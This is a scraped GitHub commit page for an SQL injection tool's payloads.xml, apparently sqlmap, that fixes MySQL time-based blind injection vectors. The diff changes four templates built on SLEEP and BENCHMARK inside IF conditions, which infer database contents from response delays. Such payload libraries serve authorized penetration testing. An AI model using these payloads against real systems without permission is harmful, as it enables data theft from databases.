Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit ad00fe1

Browse files
committed
another fix for MySQL time based payloads
1 parent 8227e6d commit ad00fe1

1 file changed

Lines changed: 5 additions & 4 deletions

File tree

xml/payloads.xml

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1426,7 +1426,7 @@ Formats:
14261426
<risk>1</risk>
14271427
<clause>1,2,3</clause>
14281428
<where>1</where>
1429-
<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
1429+
<vector>AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])</vector>
14301430
<request>
14311431
<payload>AND SLEEP([SLEEPTIME])</payload>
14321432
</request>
@@ -1446,7 +1446,7 @@ Formats:
14461446
<risk>1</risk>
14471447
<clause>1,2,3</clause>
14481448
<where>1</where>
1449-
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')))</vector>
1449+
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
14501450
<request>
14511451
<payload>AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
14521452
</request>
@@ -1585,7 +1585,8 @@ Formats:
15851585
<risk>3</risk>
15861586
<clause>1,2,3</clause>
15871587
<where>2</where>
1588-
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
1588+
<!-- NOTE: =0 needs to stay or else MySQL goes nunners -->
1589+
<vector>OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0</vector>
15891590
<request>
15901591
<payload>OR SLEEP([SLEEPTIME])=0</payload>
15911592
</request>
@@ -1605,7 +1606,7 @@ Formats:
16051606
<risk>3</risk>
16061607
<clause>1,2,3</clause>
16071608
<where>2</where>
1608-
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')))</vector>
1609+
<vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
16091610
<request>
16101611
<payload>OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
16111612
</request>

0 commit comments

Comments
 (0)